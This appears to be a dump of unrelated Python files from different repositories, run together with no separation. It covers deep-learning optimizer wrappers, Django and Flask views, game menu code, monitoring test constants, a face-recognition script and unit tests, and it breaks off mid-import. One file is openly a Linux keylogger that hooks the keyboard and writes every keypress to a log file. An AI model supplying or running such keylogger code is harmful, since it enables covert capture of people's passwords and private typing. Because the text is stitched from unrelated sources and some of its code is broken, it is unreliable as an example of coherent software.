momentum, :math:`\\lambda` is decay rate, :math:`\\gamma_t` is learning rate at the t'th iteration. :param momentum: the momentum factor. :type momentum: float :param sparse: with sparse support or not, False by default. :type sparse: bool """ def __init__(self, momentum=None, sparse=False, **kwargs): learning_method = v1_optimizers.MomentumOptimizer( momentum=momentum, sparse=sparse) super(Momentum, self).__init__( learning_method=learning_method, **kwargs) class Adam(Optimizer): """ Adam optimizer. The details of please refer `Adam: A Method for Stochastic Optimization <https://arxiv.org/abs/1412.6980>`_ .. math:: m(w, t) & = \\beta_1 m(w, t-1) + (1 - \\beta_1) \\nabla Q_i(w) \\\\ v(w, t) & = \\beta_2 v(w, t-1) + (1 - \\beta_2)(\\nabla Q_i(w)) ^2 \\\\ w & = w - \\frac{\\eta m(w, t)}{\\sqrt{v(w,t) + \\epsilon}} :param beta1: the :math:`\\beta_1` in equation. :type beta1: float :param beta2: the :math:`\\beta_2` in equation. :type beta2: float :param epsilon: the :math:`\\epsilon` in equation. It is used to prevent divided by zero. :type epsilon: float """ def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, **kwargs): learning_method = v1_optimizers.AdamOptimizer( beta1=beta1, beta2=beta2, epsilon=epsilon) super(Adam, self).__init__(learning_method=learning_method, **kwargs) class Adamax(Optimizer): """ Adamax optimizer. The details of please refer this `Adam: A Method for Stochastic Optimization <https://arxiv.org/abs/1412.6980>`_ .. math:: m_t & = \\beta_1 * m_{t-1} + (1-\\beta_1)* \\nabla Q_i(w) \\\\ u_t & = max(\\beta_2*u_{t-1}, abs(\\nabla Q_i(w))) \\\\ w_t & = w_{t-1} - (\\eta/(1-\\beta_1^t))*m_t/u_t :param beta1: the :math:`\\beta_1` in the equation. :type beta1: float :param beta2: the :math:`\\beta_2` in the equation. :type beta2: float """ def __init__(self, beta1=0.9, beta2=0.999, **kwargs): learning_method = v1_optimizers.AdamaxOptimizer( beta1=beta1, beta2=beta2) super(Adamax, self).__init__(learning_method=learning_method, **kwargs) class AdaGrad(Optimizer): """ Adagrad(for ADAptive GRAdient algorithm) optimizer. For details please refer this `Adaptive Subgradient Methods for Online Learning and Stochastic Optimization <http://www.magicbroom.info/Papers/DuchiHaSi10.pdf>`_. .. math:: G &= \\sum_{\\tau=1}^{t} g_{\\tau} g_{\\tau}^T \\\\ w & = w - \\eta diag(G)^{-\\frac{1}{2}} \\circ g """ def __init__(self, **kwargs): learning_method = v1_optimizers.AdaGradOptimizer() super(AdaGrad, self).__init__(learning_method=learning_method, **kwargs) class DecayedAdaGrad(Optimizer): """ AdaGrad method with decayed sum gradients. The equations of this method show as follow. .. math:: E(g_t^2) &= \\rho * E(g_{t-1}^2) + (1-\\rho) * g^2 \\\\ learning\\_rate &= 1/sqrt( ( E(g_t^2) + \\epsilon ) :param rho: The :math:`\\rho` parameter in that equation :type rho: float :param epsilon: The :math:`\\epsilon` parameter in that equation. :type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-06, **kwargs): learning_method = v1_optimizers.DecayedAdaGradOptimizer( rho=rho, epsilon=epsilon) super(DecayedAdaGrad, self).__init__( learning_method=learning_method, **kwargs) class AdaDelta(Optimizer): """ AdaDelta method. The details of adadelta please refer to this `ADADELTA: AN ADAPTIVE LEARNING RATE METHOD <http://www.matthewzeiler.com/pubs/googleTR2012/googleTR2012.pdf>`_. .. math:: E(g_t^2) &= \\rho * E(g_{t-1}^2) + (1-\\rho) * g^2 \\\\ learning\\_rate &= sqrt( ( E(dx_{t-1}^2) + \\epsilon ) / ( \\ E(g_t^2) + \\epsilon ) ) \\\\ E(dx_t^2) &= \\rho * E(dx_{t-1}^2) + (1-\\rho) * (-g*learning\\_rate)^2 :param rho: :math:`\\rho` in equation :type rho: float :param epsilon: :math:`\\rho` in equation :type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-06, **kwargs): learning_method = v1_optimizers.AdaDeltaOptimizer( rho=rho, epsilon=epsilon) super(AdaDelta, self).__init__( learning_method=learning_method, **kwargs) class RMSProp(Optimizer): """ RMSProp(for Root Mean Square Propagation) optimizer. For details please refer this `slide <http://www.cs.toronto.edu/~tijmen/csc321/slides/ lecture_slides_lec6.pdf>`_. The equations of this method as follows: .. math:: v(w, t) & = \\rho v(w, t-1) + (1 - \\rho)(\\nabla Q_{i}(w))^2 \\\\ w & = w - \\frac{\\eta} {\\sqrt{v(w,t) + \\epsilon}} \\nabla Q_{i}(w) :param rho: the :math:`\\rho` in the equation. The forgetting factor. :type rho: float :param epsilon: the :math:`\\epsilon` in the equation. :type epsilon: float """ def __init__(self, rho=0.95, epsilon=1e-6, **kwargs): learning_method = v1_optimizers.RMSPropOptimizer( rho=rho, epsilon=epsilon) super(RMSProp, self).__init__(learning_method=learning_method, **kwargs) ModelAverage = v1_optimizers.ModelAverage L2Regularization = v1_optimizers.L2Regularization if __name__ == '__main__': import py_paddle.swig_paddle as swig_api swig_api.initPaddle('--use_gpu=false') for opt in [ Momentum(), Adam(), Adamax(), AdaGrad(), DecayedAdaGrad(), AdaDelta(), RMSProp(), Adam( model_average=ModelAverage(average_window=0.5), regularization=L2Regularization(rate=0.5), gradient_clipping_threshold=25) ]: print opt, opt.enable_types() <filename>api/__init__.py<gh_stars>0 from flask import Flask, request, jsonify, render_template from flask_restful import Resource, Api, reqparse from flask_cors import CORS, cross_origin from sklearn.externals import joblib import json app = Flask(__name__) api = Api(app) CORS(app) def prediction(): predictor = joblib.load('models/json_data') return predictor class Clients(Resource): def get(self): data = prediction() return json.loads(data) @app.route('/') @cross_origin() def root(): return render_template("index.html") api.add_resource(Clients, '/clients')<reponame>amjcode/Keylogger<filename>linux/keylogger.py #!/usr/bin/env python import os import pyxhook # This tells the keylogger where the log file will go. # You can set the file path as an environment variable ('pylogger_file'), # or use the default ~/Desktop/file.log log_file = os.environ.get( 'pylogger_file', os.path.expanduser('~/Desktop/file.log') ) # Allow setting the cancel key from environment args, Default: ` cancel_key = ord( os.environ.get( 'pylogger_cancel', '`' )[0] ) # Allow clearing the log file on start, if pylogger_clean is defined. if os.environ.get('pylogger_clean', None) is not None: try: os.remove(log_file) except EnvironmentError: # File does not exist, or no permissions. pass def OnKeyPress(event): with open(log_file, 'a') as f: f.write('{}\n'.format(event.Key)) if event.Ascii == cancel_key: new_hook.cancel() new_hook = pyxhook.HookManager() new_hook.KeyDown = OnKeyPress new_hook.HookKeyboard() try: new_hook.start() except KeyboardInterrupt: # User cancelled from command line. pass except Exception as ex: # Write exceptions to the log file, for analysis later. msg = 'Error while catching events:\n {}'.format(ex) pyxhook.print_err(msg) with open(log_file, 'a') as f: f.write('\n{}'.format(msg)) import logging from allauth.account import views as allauth_views from django.urls import reverse_lazy logger = logging.getLogger(__name__) class MySignupView(allauth_views.SignupView): template_name = "register.html" success_url = reverse_lazy("profile:edit") class MyLoginView(allauth_views.LoginView): template_name = "login.html" success_url = reverse_lazy("profile:edit") class MyEmailView(allauth_views.EmailView): template_name = "email.html" # success_url = reverse_lazy("profile:edit") class MyConfirmEmailView(allauth_views.ConfirmEmailView): success_url = reverse_lazy("profile:edit") class MyPasswordChangeView(allauth_views.PasswordChangeView): template_name = "password_change.html" success_url = reverse_lazy("profile:edit") class MyPasswordSetView(allauth_views.PasswordSetView): template_name = "password_set.html" success_url = reverse_lazy("core:home-page") class MyPasswordResetView(allauth_views.PasswordResetView): template_name = "password_reset.html" # success_url = reverse_lazy("account_login") class MyPasswordResetDoneView(allauth_views.PasswordResetDoneView): template_name = "password_reset_done.html" class MyPasswordResetFromKeyView(allauth_views.PasswordResetFromKeyView): template_name = "password_reset_from_key.html" # success_url = reverse_lazy("profile:edit") class MyPasswordResetFromKeyDoneView(allauth_views.PasswordResetFromKeyDoneView): template_name = "password_reset_from_key_done.html" from django.db import models # Create your models here. class WeatherForecastDay(models.Model): country_code = models.CharField(max_length=8) for_day = models.DateField() average_temp_c = models.DecimalField(max_digits=5, decimal_places=2) # created_at = models.DateTimeField(auto_now_add=True class Meta: unique_together = ('country_code', 'for_day',) def __str__(self): return f'{self.country_code} {self.for_day}'<reponame>Kunalmighty/BlueJaysGame<filename>volume.py<gh_stars>0 """ #EmbraceTheS's options menu state. """ import state import options import globes as G import pygame import soundwave import game import enemy import player import items class Volume(state.State): """ Volume menu state with the option to change volume """ BACKGROUND = None NOTCH = None STEP = 0.1 def __init__(self, sound=False): state.State.__init__(self) if not sound: G.play_music("title.ogg") if (Volume.BACKGROUND is None): self.build_bg() Volume.NOTCH = pygame.image.load("bg/notch.png")\ .convert_alpha() self.option = True # True for volume, False for brightness def render(self): G.Globals.SCREEN.blit(Volume.BACKGROUND, (0, 0)) G.Globals.SCREEN.blit(Volume.NOTCH, (537 + 200 * G.Globals.VOLUME, 233)) G.Globals.SCREEN.blit(Volume.NOTCH, (537 + 200 * G.Globals.BRIGHTNESS, 313)) def update(self, time): pass def event(self, event): if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: G.Globals.STATE = options.Options(True) elif event.key == pygame.K_UP or event.key == pygame.K_DOWN: self.option = not self.option elif event.key == pygame.K_LEFT: if self.option: self.change_volume(-Volume.STEP) else: self.change_brightness(-Volume.STEP) elif event.key == pygame.K_RIGHT: if self.option: self.change_volume(Volume.STEP) else: self.change_brightness(Volume.STEP) def build_bg(self): # G.Globals.FONT is size 30 font = pygame.font.Font(None, 35) Volume.BACKGROUND = pygame.image.load("bg/titlescreen.png")\ .convert() surf = pygame.image.load("bg/bar.png").convert_alpha() Volume.BACKGROUND.blit(surf, (532, 230)) Volume.BACKGROUND.blit(surf, (532, 310)) surf = font.render("Brightness", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 280)) surf = font.render("Volume", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 165)) surf = G.Globals.FONT.render("Hit 'm' to mute/unmute", True, G.BLACK) Volume.BACKGROUND.blit(surf, (532, 200)) def change_volume(self, change): if ((change < 0 and G.Globals.VOLUME <= 0) or (change > 0 and G.Globals.VOLUME >= 1)): return G.Globals.VOLUME += change set_volume_levels() def change_brightness(self, change): if ((change < 0 and G.Globals.BRIGHTNESS <= 0) or (change > 0 and G.Globals.BRIGHTNESS >= 1)): return G.Globals.BRIGHTNESS += change pygame.display.set_gamma(G.Globals.BRIGHTNESS, G.Globals.BRIGHTNESS, G.Globals.BRIGHTNESS) def set_volume_levels(): if G.Globals.MUTE: level = 0 else: level = G.Globals.VOLUME G.Globals.SOUND.set_volume(level) if soundwave.Soundwave.SOUND is not None: soundwave.Soundwave.SOUND.set_volume(level) if game.Game.ENEMY_BOUNCE is not None: game.Game.ENEMY_BOUNCE.set_volume(level) if game.Game.EVIL_LAUGH is not None: game.Game.EVIL_LAUGH.set_volume(level) if player.Player.WALLSOUND is not None: player.Player.WALLSOUND.set_volume(level) if items.Airplane.SOUND is not None: items.Airplane.SOUND.set_volume(level) # items.Twain.SOUND.set_volume(level) """ AWSConnector setup """ from setuptools import setup if __name__ == "__main__": setup( name="AWSConnector", include_package_data=True, data_files=[ ( "etc/jupyter/jupyter_server_config.d", ["jupyter-config/jupyter_server_config.d/AWSConnector.json"] ), ] ) # (C) Datadog, Inc. 2018-present # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) import os from packaging import version from datadog_checks.dev import get_docker_hostname PORT = '8500' HOST = get_docker_hostname() URL = 'http://{}:{}'.format(HOST, PORT) CHECK_NAME = 'consul' HERE = os.path.dirname(os.path.abspath(__file__)) CONSUL_VERSION = os.getenv('CONSUL_VERSION') PROMETHEUS_ENDPOINT_AVAILABLE = version.parse(CONSUL_VERSION) > version.parse('1.1.0') # Not all the metrics are exposed in this test environment. # raft.replication.installSnapshot and raft.replication.appendEntries.logs are not tested # since our testing environment does not easily expose them. PROMETHEUS_METRICS = [ 'consul.client.rpc', 'consul.memberlist.msg.alive', 'consul.memberlist.tcp.accept', 'consul.memberlist.tcp.connect', 'consul.memberlist.tcp.sent', 'consul.memberlist.udp.received', 'consul.memberlist.udp.sent', 'consul.raft.state.candidate', 'consul.raft.state.leader', 'consul.serf.events', 'consul.serf.member.join', 'consul.serf.member.update', ] PROMETHEUS_METRICS_1_9 = ['consul.client.rpc.failed', 'consul.raft.leader.lastContact.count'] PROMETHEUS_HIST_METRICS = [ 'consul.memberlist.gossip.', 'consul.memberlist.probenode.', 'consul.memberlist.probenode.', 'consul.memberlist.pushpullnode.', 'consul.raft.commitTime.', 'consul.raft.leader.dispatchLog.', 'consul.runtime.gc_pause_ns.', 'consul.serf.coordinate.adjustment_ms.', 'consul.serf.msgs.sent.', 'consul.serf.msgs.received.', ] PROMETHEUS_HIST_METRICS_1_9 = [ 'consul.raft.replication.appendEntries.rpc.', 'consul.raft.replication.heartbeat.', ] # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'ui/table_dialog.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_tableDialog(object): def setupUi(self, tableDialog): tableDialog.setObjectName("tableDialog") tableDialog.resize(400, 290) tableDialog.setMaximumSize(QtCore.QSize(400, 300)) tableDialog.setSizeGripEnabled(False) tableDialog.setModal(False) self.buttonBox = QtWidgets.QDialogButtonBox(tableDialog) self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32)) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonBox.setObjectName("buttonBox") self.retranslateUi(tableDialog) self.buttonBox.accepted.connect(tableDialog.accept) self.buttonBox.rejected.connect(tableDialog.reject) QtCore.QMetaObject.connectSlotsByName(tableDialog) def retranslateUi(self, tableDialog): _translate = QtCore.QCoreApplication.translate tableDialog.setWindowTitle(_translate("tableDialog", "Table Options")) <filename>gran_dag/data.py # coding=utf-8 """ GraN-DAG Copyright © 2019 Authors of Gradient-Based Neural DAG Learning Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import os import numpy as np import torch class DataManagerFile(object): def __init__(self, file_path, i_dataset, train_samples=0.8, test_samples=None, train=True, normalize=False, mean=None, std=None, random_seed=42): """ Parameters: ----------- train_samples: uint or float, default=0.8 If float, specifies the proportion of data used for training and the rest is used for testing. If an integer, specifies the exact number of examples to use for training. test_samples: uint, default=None Specifies the number of examples to use for testing. The default value uses all examples that are not used for training. """ self.random = np.random.RandomState(random_seed) # Load the graph adjacency = np.load(os.path.join(file_path, "DAG{}.npy".format(i_dataset))) self.adjacency = torch.as_tensor(adjacency).type(torch.Tensor) # Load data self.data_path = os.path.join(file_path, "data{}.npy".format(i_dataset)) data = np.load(self.data_path) # Determine train/test partitioning if isinstance(train_samples, float): train_samples = int(data.shape[0] * train_samples) if test_samples is None: test_samples = data.shape[0] - train_samples assert train_samples + test_samples <= data.shape[0], "The number of examples to load must be smaller than " + \ "the total size of the dataset" # Shuffle and filter examples shuffle_idx = np.arange(data.shape[0]) self.random.shuffle(shuffle_idx) data = data[shuffle_idx[: train_samples + test_samples]] # Train/test split if not train: if train_samples == data.shape[0]: # i.e. no test set self.dataset = None else: self.dataset = torch.as_tensor(data[train_samples: train_samples + test_samples]).type(torch.Tensor) else: self.dataset = torch.as_tensor(data[: train_samples]).type(torch.Tensor) # Normalize data self.mean, self.std = mean, std if normalize: if self.mean is None or self.std is None: self.mean = torch.mean(self.dataset, 0, keepdim=True) self.std = torch.std(self.dataset, 0, keepdim=True) self.dataset = (self.dataset - self.mean) / self.std self.num_samples = self.dataset.size(0) def sample(self, batch_size): sample_idxs = self.random.choice(np.arange(int(self.num_samples)), size=(int(batch_size),), replace=False) samples = self.dataset[torch.as_tensor(sample_idxs).long()] return samples, torch.ones_like(samples) # second output is mask (for intervention in the future) <gh_stars>0 """Convert representations for cmlkit""" import numpy as np def to_local(data, rep): """Convert dscribe-style atomic rep to cmlkit-style atomic rep. dscribe returns local descriptors as one flat array of dimension n_total_atoms x dim, whereas cmlkit expects a ndarray-list of length n_systems, where each entry is an ndarry of dim n_atoms_system x dim, i.e. the local representations for each atom in this particular system. The translation between these two notations is done via an offset array, which keeps track of which entries in the dscribe array belong to which atom. Args: data: Dataset instance rep: ndarray n_total_atoms x dim Returns: cmlkit-style atomic representation """ counts = data.info["atoms_by_system"] offsets = np.zeros(len(counts) + 1, dtype=int) offsets[1::] = np.cumsum(counts) return np.array( [rep[offsets[i] : offsets[i + 1]] for i in range(data.n)], dtype=object ) def in_blocks(data, rep, elems=None): """Arrange local representation in blocks by element. Some representations (ACSF) are returned without taking the central atom type into account. This doesn't work with kernel ridge regression, so we re-arrange the respresentation into zero-padded element blocks, like so: Let (...) be the representation. Let's say we have Z's 1 and 2. Let's say we have one molecule with first atom Z1=1, second Z2=1. Let's say we have dim=2. The result of this function will be [ (Z1=1) (0, 0), (0, 0), (Z2=1) ] I.e. we will have separate blocks for each central atom, filled with zeros where the central atom type is "not in use". Args: data: Dataset instance rep: cmlkit-style atomic representation elems: List of elements to take into account, if not specified will use the ones given in data. Returns: cmlkit-style atomic representation """ if elems is None: n_elems = data.info["total_elements"] elem_idx = {e: i for i, e in enumerate(data.info["elements"])} else: n_elems = len(elems) elem_idx = {e: i for i, e in enumerate(elems)} all_new = [] for i, rep_system in enumerate(rep): dim = len(rep_system[0]) new = np.zeros((len(rep_system), dim * n_elems)) for j, rep_atom in enumerate(rep_system): idx = elem_idx[data.z[i][j]] new[j, idx * dim : (idx + 1) * dim] = rep_atom all_new.append(new) return np.array(all_new, dtype=object) ''' Reshape operation and expr. ''' from .shuffle import shuffle from .ndarray import ndarray import numpy as np def _retile_mapper(array, ex, orig_array): yield ex, orig_array.fetch(ex) def retile(array, tile_hint): ''' Change the tiling of ``array``, while retaining the same shape. Args: array(Expr): Array to reshape tile_hint(tuple): New tile shape ''' tiling_type = int(tile_hint[0] == array.shape[0]) new_array = shuffle(ndarray(array.shape, tile_hint=tile_hint).force(), _retile_mapper, kw={'orig_array':array}, shape_hint=array.shape, cost_hint={hash(array):{'%d%d' % (tiling_type, tiling_type): 0, '%d%d' % (1-tiling_type, tiling_type): np.prod(array.shape)}}) return new_array.optimized() class Solution: def plusOne(self, digits: List[int]) -> List[int]: ind = len(digits) - 1 for ind in range(ind,-1,-1): num = digits[ind] if num == 9: digits[ind] = 0 else: digits[ind] = num+1 break else: return [1] + digits return digits#!/usr/bin/env python # vim: set fileencoding=utf-8 : from os import path, remove PROJECT_DIRECTORY: str = path.realpath(path.curdir) def remove_file(filepath: str) -> None: remove(path.join(PROJECT_DIRECTORY, filepath)) if __name__ == "__main__": if "Other" == "{{ cookiecutter.license }}": remove_file("LICENSE") from html import unescape as unescape_chars full_name: str = unescape_chars("{{ cookiecutter.full_name | escape }}") if '"' in full_name: import fileinput import sys with fileinput.input( path.join(PROJECT_DIRECTORY, "docs", "source", "conf.py"), inplace=True, ) as f: for line in f: sys.stdout.write(line.replace(f'"{full_name}"', f"'{full_name}'")) with fileinput.input( path.join(PROJECT_DIRECTORY, "setup.py"), inplace=True, ) as f: for line in f: sys.stdout.write(line.replace(f'"{full_name}"', f"'{full_name}'")) import os from subprocess import check_call, check_output CODE_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "source")) ROOT_PATH = os.path.abspath(os.path.join(CODE_PATH, "../..")) def run_python(python_binary, command, extra_args=(), output=False, additional_env={}): """ Run a Python program. Returns output if output=True, in which case stderr will cause error. """ args = [python_binary, os.path.join(CODE_PATH, command)] + list(extra_args) if output: command = check_output else: command = check_call env = os.environ.copy() env.update(additional_env) return command(args, env=env) <reponame>imec-int/federated-learning-lib """ Licensed Materials - Property of IBM Restricted Materials of IBM 20190891 © Copyright IBM Corp. 2021 All Rights Reserved. """ """ The Message class is the essential information passing object, it contains information about the data sent from a node, the id_request, and the rank associated with the node in the network """ __author__ = "<NAME>, <NAME>, <NAME>, all ARC team" class Message(object): """ Class to create message for communication between party and aggregator """ # Counter to keep track of the request request_id = 0 def __init__(self, message_type=None, id_request=None, data=None, sender_info=None): """ Initializes an `Message` object :param message_type: type of message :type message_type: `int` :param id_request: id of current request - will be used to track responses :type id_request: `int` :param data: actual data payload :type data: `b[]` """ self.message_type = message_type self.sender_info = sender_info self.data = data if id_request is None: self.id_request = Message.get_request_id() else: self.id_request = id_request return def get_header(self): """ Get header information for the message :param: None :return: information about rank, id_request, and message_type :rtype: `dict` """ return { 'id_request': self.id_request, 'message_type': self.message_type, 'sender_info': self.sender_info } def set_data(self, data): """set data into the message :param data: :type data: `dict` """ # replace this with methods from the data class self.data = data def set_header(self, header): """update message information using contents in header :param header: dictionary with message information :type header: `dict` """ self.id_request = header['id_request'] self.message_type = header['message_type'] self.sender_info = header['sender_info'] def get_data(self): """ Get actual data from the message :param: None :return: data :rtype: `bytes` """ # replace this with methods from the data class return self.data def add_sender_info(self, info): """Information related to source who is sending/initiating this message :param info: Sender information :type info: `dict` """ self.sender_info = info def get_sender_info(self): """Information related to source who sent this message :return: info. Sender information :rtype: `dict` """ return self.sender_info @staticmethod def get_request_id(): Message.request_id = Message.request_id + 1 return Message.request_id def __getstate__(self): print('called') msg_dict = self.__dict__.copy() return msg_dict def __setstate__(self, dict): self.__dict__.update(dict) class ResponseMessage(Message): def __init__(self, req_msg=None, message_type=None, id_request=None, data=None): if req_msg and isinstance(req_msg, Message): super().__init__(message_type=req_msg.message_type, id_request=req_msg.id_request) else: super().__init__(message_type, id_request, data) return from fastapi import APIRouter from pydantic import BaseModel from starlette.requests import Request from Utils import Redis from Utils.Configuration import UPDATE_KEY from Utils.Responses import unauthorized_response router = APIRouter() class Body(BaseModel): key: str type: str @router.post("/update") async def update(request: Request, body: Body): # Disable endpoint by default. Re-enable by generating a update key in the config if UPDATE_KEY == None or body.key != UPDATE_KEY: return unauthorized_response await Redis.send_to_bot("update", type=body.type) <gh_stars>0 import cv2 import numpy as np import sys import MySQLdb recognizer = cv2.createLBPHFaceRecognizer() recognizer.load('trainner/trainner.yml') cascadePath = "haarcascade_frontalface_default.xml" faceCascade = cv2.CascadeClassifier(cascadePath); db = MySQLdb.connect (host="127.0.0.1",user="root",passwd="<PASSWORD>",db="imagepro") cursor=db.cursor() cursor2=db.cursor() cursor.execute("select upload from uploads") data=cursor.fetchall() list1=[] for row in data: list1.append(row[0]) print(list1) im2='test/'+list1[0] print(im2) i=0 for index in range(len(list1)): #cam = cv2.VideoCapture(0) font = cv2.cv.InitFont(cv2.cv.CV_FONT_HERSHEY_SIMPLEX, 1, 1, 0, 4, 1) while True: im_name='uploads/'+list1[i] im =cv2.imread(im_name) #ret, im =cam.read() gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) faces=faceCascade.detectMultiScale(gray, 1.2,5) for(x,y,w,h) in faces: cv2.rectangle(im,(x,y),(x+w,y+h),(225,0,0),2) Id, conf = recognizer.predict(gray[y:y+h,x:x+w]) nbr_predicted, conf = recognizer.predict(gray[y:y+h,x:x+w]) cv2.rectangle(im,(x-50,y-50),(x+w+50,y+h+50),(0,225,0),2) cursor2.execute("select name from users where id=%s",(nbr_predicted)) data2=cursor2.fetchall() for row in data2: pred_name=row[0] print(pred_name) cv2.cv.PutText(cv2.cv.fromarray(im),"name="+(pred_name)+"//id="+str(nbr_predicted), (x-50,y),font, 900) #Draw the text #cv2.imshow('im',im) im_out='result/'+list1[i] cv2.imwrite(im_out,im); i=i+1 sys.exit("Done !!") cv2.waitKey(10) cam.release() cv2.destroyAllWindows()<filename>services/Baseline_Approach/cells_lookup_strategies/strategy.py<gh_stars>0 import abc from external_services.dbpedia_lookup_service import DBpedia_Lookup_Service from external_services.wikidata_lookup_service import Wikidata_Lookup_Service from external_services.generic_lookup_service import Generic_Lookup_Service from config import TARGET_KG, DBPEDIA, WIKIDATA from utils.wikidata_util import getWikiID import utils.string_dist as sDist class CellsStrategy(object, metaclass=abc.ABCMeta): def __init__(self, name, priority): # Set name and priority for the strategy self.name = name self.priority = priority # Conditional init of lookup service. self.GenericService = Generic_Lookup_Service() if TARGET_KG == DBPEDIA: self.LookupService = DBpedia_Lookup_Service() if TARGET_KG == WIKIDATA: self.LookupService = Wikidata_Lookup_Service() # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Abstract Methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ @abc.abstractmethod def process_cell_values(self, cell): """ provide an alternative label to get candidates by """ raise NotImplementedError("process_cell_values must be implemented") # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Common Methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ def get_most_similar_mappings(self, mappings, target_val, k=500): """ filter mappings to top-k candidates only, default = 500 """ # shortcircuit, if there are not enough candidates anyways if len(mappings) <= k: return mappings # add distance to each entry target_val = target_val.lower() dist = [{ 'entry': entry, 'dist': min(sDist.levenshtein(label.lower(), target_val) for label in entry['labels']) } for entry in mappings] # sort by distance dist.sort(key=lambda x: x['dist']) # take the first k entries dist = dist[:k] return [el['entry'] for el in dist] def get_mappings(self, cells): """ add candidates to the given cells by using different strategies to expand the alternative labels """ # first pass, collect lookup terms for cells term2cell = {} for cell in cells: # get modified labels terms = self.process_cell_values(cell) # if there are no matches, we dont need to proceed if not terms: continue # make sure we have a list here if isinstance(terms, str): terms = [terms] # make sure all terms are unique terms = list(set(terms)) # only include new search terms that are non-empty terms = [term for term in terms if term.strip()] # only terms that are different from the original values terms = [term for term in terms if term != cell['value']] # if something is left, add it to the queue if terms: for term in terms: if term not in term2cell: term2cell[term] = [] term2cell[term].append(cell) # short-circuit, if there is nothing to resolve if not term2cell: return # run the lookup service for all terms res = self.LookupService.look_for_lst.send([list(term2cell.keys()), None]) # shorten the URIs for vals in res.values(): for el in vals: el['uri'] = getWikiID(el['uri']) # add the results to the respective cells for term, cands in res.items(): if term in term2cell: for cell in term2cell[term]: cell['cand'].extend(cands) # postprocess for cell in cells: # just select the top entries topK = self.get_most_similar_mappings(cell['cand'], cell['value']) cell['cand'] = topK <filename>django_project_lb_02/cookies_demo/views.py from django.shortcuts import render from django.http.response import JsonResponse # Create your views here. def cookies_demo(request): # 接收参数 response=JsonResponse({'key':'cookies_values'}) # 设置cookies response.set_cookie('LiBin','<EMAIL>',max_age=60) # 读取cookies ret =request.COOKIES print(ret) # 删除 cookies response.delete_cookie('LiBin') return responsefrom aql_testcase import AqlTestCase from aql.utils import CLIOption, CLIConfig, Tempfile class TestCLIConfig(AqlTestCase): def test_cli_config(self): cli_options = ( CLIOption("-l", "--log-level", "log_level", int, None, "", 'NUMBER'), CLIOption("-j", "--jobs", "jobs", int, 1, "", 'NUMBER'), CLIOption("-s", "--size", "size", int, 256, "", 'NUMBER'), CLIOption("-q", "--quite", "quite", bool, False, ""), CLIOption("-v", "--verbose", "verbose", bool, False, ""), ) config = CLIConfig(cli_options, ["-j", "0", "-v", "-s32", "foo", "bv=release", "jobs=10"]) config.set_default('jobs', 3) config.set_default('size', 10) config.set_default('new_size', 2) self.assertEqual(config.jobs, 10) self.assertEqual(config.size, 32) self.assertIs(config.log_level, None) self.assertEqual(config.new_size, 2) self.assertSequenceEqual(config.targets, ['foo']) self.assertEqual(config.bv, 'release') self.assertFalse(config.quite) self.assertTrue(config.verbose) config.set_default('log_level', 1) self.assertEqual(config.log_level, 1) config.log_level = 2 config.set_default('log_level', 0) self.assertEqual(config.log_level, 2) config.jobs = 10 self.assertEqual(config.jobs, 10) config.size = 20 self.assertEqual(config.size, 20) config.new_size = 1 self.assertEqual(config.new_size, 1) config.set_default('new_size', 30) self.assertTrue(config.new_size, 1) # ========================================================== def test_cli_config_file(self): cli_options = ( CLIOption("-j", "--jobs", "jobs", int, 1, "", 'NUMBER'), CLIOption("-s", "--size", "size", int, 256, "", 'NUMBER'), CLIOption("-q", "--quite", "quite", bool, False, ""), CLIOption("-v", "--verbose", "verbose", bool, False, ""), ) with Tempfile() as f: cfg = b""" abc = 123 size = 100 jobs = 4 options['BUILD'] = "DEBUG" targets="test1 test2 test3" """ f.write(cfg) f.flush() config = CLIConfig(cli_options, ["-j", "0", "-v", "foo", "bar", "bv=release", "jobs=10"]) options = {} config.read_file(f, {'options': options}) self.assertRaises(AttributeError, getattr, config, 'options') self.assertEqual(config.abc, 123) self.assertEqual(options['BUILD'], 'DEBUG') self.assertEqual(config.jobs, 10) self.assertEqual(config.size, 100) self.assertEqual(config.targets, "foo, bar") config = CLIConfig(cli_options, ["-j", "0", "-v", "bv=release", "jobs=10"]) options = {} config.read_file(f, {'options': options}) self.assertEqual( config.targets, ["test1", "test2", "test3", "test3"]) cli_values = {'abc': 123, 'jobs': 10, 'verbose': True, 'quite': False, 'bv': 'release', 'size': 100} self.assertEqual(dict(config.items()), cli_values) # -*- coding: utf-8 -*- from dotenv import load_dotenv load_dotenv() import scrapy, schedule, time, logging, requests from 